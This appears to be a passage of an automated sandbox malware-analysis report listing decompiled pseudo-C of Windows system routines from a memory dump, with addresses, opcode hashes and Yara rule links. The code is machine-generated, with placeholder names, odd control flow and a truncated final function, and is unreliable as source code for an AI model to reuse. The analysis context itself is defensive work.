                          0x048f4705
                          0x048f4706
                          0x048f470c
                          0x048f4713
                          0x048f471b
                          0x048f4723
                          0x048f4725
                          0x048f46d6
                          0x048f46d9
                          0x048f46db
                          0x048f46db
                          0x048f4732

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                          • Instruction ID: eb12a839118209ae9ae005f834dc80d573aaec19950bc76c0a62af4c49df2e46
                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                          • Instruction Fuzzy Hash: DD112572504608BFDB019F5CD8808BEB7F9EF95708F10816AF984C7350DA71AD51D7A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0487C962, Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          C-Code - Quality: 42%
                          			E0487C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x496d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0488EEF0(0x49670a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E048FF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0488EB70(_t29, 0x49670a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E048BB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E048FF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x49670c0; // 0x0
					while(_t38 != 0x49670c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x496b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                          0x0487c96a
                          0x0487c974
                          0x0487c988
                          0x0487c98a
                          0x048e7c9d
                          0x048e7c9f
                          0x048e7ca4
                          0x048e7cae
                          0x048e7cf0
                          0x048e7cf5
                          0x048e7cfa
                          0x0487c992
                          0x0487c996
                          0x0487c997
                          0x0487c998
                          0x0487c9a3
                          0x0487c9a3
                          0x048e7cb0
                          0x048e7cb7
                          0x048e7cbb
                          0x00000000
                          0x00000000
                          0x048e7cbd
                          0x048e7ce8
                          0x048e7cc5
                          0x048e7cc8
                          0x048e7cca
                          0x048e7cd0
                          0x048e7cd6
                          0x048e7cde
                          0x048e7ce4
                          0x048e7ce4
                          0x048e7cd0
                          0x00000000
                          0x048e7ce8
                          0x0487c990
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: edbd7cf692663d72c2857646515ccb16f83d2aecbf825670c6ec5c23fb4c3e01
                          • Instruction ID: ccc122adbfe9567d0a038bb5ba6abd405c3c2dd882da273c1d676ef710fa800e
                          • Opcode Fuzzy Hash: edbd7cf692663d72c2857646515ccb16f83d2aecbf825670c6ec5c23fb4c3e01
                          • Instruction Fuzzy Hash: 1C11C2317146469BD710AF6EDC85A7A77E9FB85618B000B39E942C3651EB64FC10CBD2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B37F5, Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E048B37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04892280(_t6, 0x4968550);
				}
				_t29 = E048B387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0488FFB0(0x4968550, _t27, 0x4968550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                          0x048b37fa
                          0x048b37fc
                          0x048b3805
                          0x048b3808
                          0x048b3808
                          0x048b3814
                          0x048b3818
                          0x048b3846
                          0x048b3848
                          0x048b384b
                          0x048b384b
                          0x048b3852
                          0x00000000
                          0x048b3854
                          0x048b3856
                          0x00000000
                          0x00000000
                          0x048b3863
                          0x00000000
                          0x048b3863
                          0x048b381a
                          0x048b381a
                          0x048b381f
                          0x048b386e
                          0x048b386e
                          0x048b3871
                          0x048b3873
                          0x048b3873
                          0x048b3868
                          0x00000000
                          0x048b3868
                          0x048b3821
                          0x048b3826
                          0x00000000
                          0x00000000
                          0x048b3828
                          0x048b382a
                          0x048b3841
                          0x00000000
                          0x048b3841

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 199e453a851e667f4a21e9124b9c55f5ef198815047a63fc6445327d9f843823
                          • Instruction ID: ed360c5dce51639a78834b75910dd9b94148a27f5773e69df8b9aad70452844f
                          • Opcode Fuzzy Hash: 199e453a851e667f4a21e9124b9c55f5ef198815047a63fc6445327d9f843823
                          • Instruction Fuzzy Hash: F0010472A016109FC3278A1D9900A66BBE6DF81B547154A6DEDC5CB310DB30F800D7C2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0488766D, Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E0488766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E048AF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E048AF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04894620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                          0x04887672
                          0x0488767f
                          0x04887689
                          0x048876de
                          0x048876de
                          0x0488768b
                          0x04887691
                          0x04887693
                          0x04887697
                          0x00000000
                          0x04887699
                          0x048876a8
                          0x00000000
                          0x048876aa
                          0x048876ad
                          0x048876b1
                          0x00000000
                          0x048876b3
                          0x048876b3
                          0x048876b5
                          0x048876ba
                          0x048876bc
                          0x048876bc
                          0x048876c0
                          0x00000000
                          0x048876c2
                          0x048876ce
                          0x048876ce
                          0x048876c0
                          0x048876b1
                          0x048876a8
                          0x04887697
                          0x048876d9

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                          • Instruction ID: 5c11660598fc58842ca592df4d758faaab7b2da5b88e4f07df37a2dcdf927875
                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                          • Instruction Fuzzy Hash: 7F017172705119ABD720FE5ECC41E5B7ABDEB84B60F240E38BA08CB251DA61ED1187A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04879080, Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E04879080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x49685ec;
				E04892280(_t48, 0x49685ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0488FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x496538c; // 0x771c68c8
					if( *_t84 != 0x4965388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x494f6e8);
						E048CD0E8(0x49685ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E049488F5(_t80, _t85, 0x4965388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x49686c0; // 0x6907b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x49686b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04892280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E049488F5(0x49685ec, _t85, 0x4965388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E048BAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x496b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x49684c0;
																			if(_t82 >=  *0x49684c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04949063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0487922A(_t99);
										_t64 = E04897D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04948B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x49686c0; // 0x6907b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x49686b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x49686bc;
													_t87 = 0x49686b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04879240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x49686c4;
												_t87 = 0x49686c0;
												L27:
												E048A9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E048CD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4965388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x496538c = _t51;
						goto L6;
					}
				}
			}




















                          0x04879082
                          0x04879083
                          0x04879084
                          0x04879085
                          0x04879087
                          0x04879096
                          0x04879098
                          0x04879098
                          0x0487909e
                          0x048790a8
                          0x048790e7
                          0x048790e7
                          0x048790aa
                          0x048790b0
                          0x048790b7
                          0x048790bd
                          0x048790dd
                          0x048790e6
                          0x048790bf
                          0x048790bf
                          0x048790c7
                          0x048790cf
                          0x048790f1
                          0x048790f2
                          0x048790f4
                          0x048790f5
                          0x048790f6
                          0x048790f7
                          0x048790f8
                          0x048790f9
                          0x048790fa
                          0x048790fb
                          0x048790fc
                          0x048790fd
                          0x048790fe
                          0x048790ff
                          0x04879100
                          0x04879102
                          0x04879107
                          0x0487910c
                          0x04879110
                          0x04879113
                          0x04879115
                          0x04879136
                          0x0487913f
                          0x04879143
                          0x048d37e4
                          0x048d37e4
                          0x04879117
                          0x04879117
                          0x0487911d
                          0x00000000
                          0x0487911f
                          0x0487911f
                          0x04879125
                          0x00000000
                          0x04879127
                          0x0487912d
                          0x04879130
                          0x04879134
                          0x04879158
                          0x0487915d
                          0x04879161
                          0x04879168
                          0x048d3715
                          0x0487916e
                          0x0487916e
                          0x04879175
                          0x04879177
                          0x0487917e
                          0x0487917f
                          0x04879182
                          0x04879182
                          0x04879187
                          0x04879187
                          0x0487918a
                          0x0487918d
                          0x0487918f
                          0x04879192
                          0x04879195
                          0x04879198
                          0x04879198
                          0x04879198
                          0x0487919a
                          0x00000000
                          0x00000000
                          0x048d371f
                          0x048d3721
                          0x048d3727
                          0x048d372f
                          0x048d3733
                          0x048d3735
                          0x048d3738
                          0x048d373b
                          0x048d373d
                          0x048d3740
                          0x00000000
                          0x048d3746
                          0x048d3746
                          0x048d3749
                          0x00000000
                          0x048d374f
                          0x048d374f
                          0x048d3751
                          0x048d3757
                          0x048d3759
                          0x048d375c
                          0x048d375c
                          0x048d375e
                          0x048d375e
                          0x048d3761
                          0x048d3764
                          0x00000000
                          0x00000000
                          0x048d3766
                          0x048d3768
                          0x048d37a3
                          0x048d37a3
                          0x048d37a5
                          0x048d37a7
                          0x048d37ad
                          0x048d37b0
                          0x048d37b2
                          0x048d37bc
                          0x048d37c2
                          0x048d37c2
                          0x048d37b2
                          0x04879187
                          0x04879187
                          0x0487918a
                          0x0487918d
                          0x0487918f
                          0x04879192
                          0x04879195
                          0x00000000
                          0x04879195
                          0x00000000
                          0x048d376a
                          0x048d376a
                          0x048d376a
                          0x048d376c
                          0x048d376c
                          0x048d376f
                          0x048d3775
                          0x00000000
                          0x00000000
                          0x048d3777
                          0x048d3779
                          0x048d3782
                          0x048d3787
                          0x048d3789
                          0x048d3790
                          0x048d3790
                          0x048d378b
                          0x048d378b
                          0x048d378b
                          0x048d3792
                          0x048d3795
                          0x00000000
                          0x048d3795
                          0x00000000
                          0x048d3779
                          0x048d3798
                          0x00000000
                          0x048d3798
                          0x00000000
                          0x048d3768
                          0x048d379b
                          0x048d379b
                          0x048d3751
                          0x048d3749
                          0x00000000
                          0x048d3740
                          0x048791a0
                          0x048791a3
                          0x048791a9
                          0x048791b0
                          0x00000000
                          0x048791b0
                          0x04879187
                          0x048791b4
                          0x048791b4
                          0x048791bb
                          0x048791c0
                          0x048791c5
                          0x048791c7
                          0x048d37da
                          0x048791cd
                          0x048791cd
                          0x048791cd
                          0x048791d2
                          0x048791d5
                          0x04879239
                          0x04879239
                          0x048791d7
                          0x048791db
                          0x048791e1
                          0x048791e7
                          0x048791fd
                          0x04879203
                          0x0487921e
                          0x04879223
                          0x00000000
                          0x04879205
                          0x04879205
                          0x04879208
                          0x0487920c
                          0x04879214
                          0x04879214
                          0x0487920c
                          0x048791e9
                          0x048791e9
                          0x048791ee
                          0x048791f3
                          0x048791f3
                          0x048791f3
                          0x048791e7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x04879134
                          0x04879125
                          0x0487911d
                          0x0487914e
                          0x048790d1
                          0x048790d1
                          0x048790d3
                          0x048790d6
                          0x048790d8
                          0x00000000
                          0x048790d8
                          0x048790cf

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0489960e437adc83f1aa5de1af75787728ccb5c36788628bf12ff1a9c3d28637
                          • Instruction ID: ffc75122cc09e2a8563a349720cd7b85a7b93b217e90784e2520dfe37c1d2b06
                          • Opcode Fuzzy Hash: 0489960e437adc83f1aa5de1af75787728ccb5c36788628bf12ff1a9c3d28637
                          • Instruction Fuzzy Hash: 9B01D1B2615604DFE314AF08D840B11BBE9EB41724F264A7AE501DB691C374EC41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0490C450, Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          C-Code - Quality: 46%
                          			E0490C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E048B9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E048B95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E048B95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E048B95D0();
				return L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                          0x0490c458
                          0x0490c45d
                          0x0490c466
                          0x0490c468
                          0x0490c469
                          0x0490c46a
                          0x0490c46b
                          0x0490c46e
                          0x0490c46f
                          0x0490c471
                          0x0490c476
                          0x0490c476
                          0x0490c47c
                          0x0490c47e
                          0x0490c480
                          0x0490c480
                          0x0490c483
                          0x0490c484
                          0x0490c486
                          0x0490c488
                          0x0490c48f
                          0x0490c491
                          0x0490c493
                          0x0490c493
                          0x0490c48f
                          0x0490c498
                          0x0490c49e
                          0x0490c4ad
                          0x0490c4ad
                          0x0490c4b2
                          0x0490c4b4
                          0x0490c4cd

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                          • Instruction ID: e91e6b82ce8bf76b1624acb73986d1dbdcba1ff43c0747ce46b5e7eb921a065d
                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                          • Instruction Fuzzy Hash: D2019671180509BFE725AF69CC80EA2FB6DFF55354F008625F254826A0C761BCA0C6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04944015, Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          C-Code - Quality: 86%
                          			E04944015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04892280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04892280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x49686ac);
					E0487F900(0x49686d4, _t28);
					E0488FFB0(0x49686ac, _t28, 0x49686ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0488FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                          0x0494401a
                          0x0494401e
                          0x04944023
                          0x04944028
                          0x04944029
                          0x0494402b
                          0x0494402f
                          0x04944043
                          0x04944046
                          0x04944051
                          0x04944057
                          0x0494405f
                          0x04944062
                          0x04944067
                          0x0494406f
                          0x0494407c
                          0x0494407c
                          0x0494408c
                          0x0494408c
                          0x04944097

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc351f2c5e25e4dc7c35918a39c37cfda43593642f692c7a5c7ee3e27a8fac6e
                          • Instruction ID: fcec0bf4400534034cb9e570c94f1fb78eda1d74fb7456b24b22b9b72971709e
                          • Opcode Fuzzy Hash: bc351f2c5e25e4dc7c35918a39c37cfda43593642f692c7a5c7ee3e27a8fac6e
                          • Instruction Fuzzy Hash: B0017171202945BFE711BB6DCD80E13B7ACEF85658B040B29B608D3A12DB64FC11C6E5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 049314FB, Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          C-Code - Quality: 61%
                          			E049314FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x496d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E048BFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04897D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E048BB640(E048B9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                          0x049314fb
                          0x049314fb
                          0x0493150a
                          0x04931514
                          0x04931519
                          0x0493151b
                          0x04931526
                          0x0493152c
                          0x04931534
                          0x04931537
                          0x0493153a
                          0x04931545
                          0x04931557
                          0x04931547
                          0x04931550
                          0x04931550
                          0x04931562
                          0x04931563
                          0x04931565
                          0x0493156a
                          0x0493157f

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08f7a6b98ee9cc6ab6a0d25ebcb6fa7e18f030bc3944e640ccb9c19b5f69c516
                          • Instruction ID: d2f97c01414d2696ef14170329c57bc51a08df53317215f8cffcae466136e64b
                          • Opcode Fuzzy Hash: 08f7a6b98ee9cc6ab6a0d25ebcb6fa7e18f030bc3944e640ccb9c19b5f69c516
                          • Instruction Fuzzy Hash: FD018071A01248AFDB04DF6DD842EAEBBB8EF45714F004566F915EB380D674EE40CB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0493138A, Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          C-Code - Quality: 61%
                          			E0493138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x496d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E048BFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04897D50() == 0) {
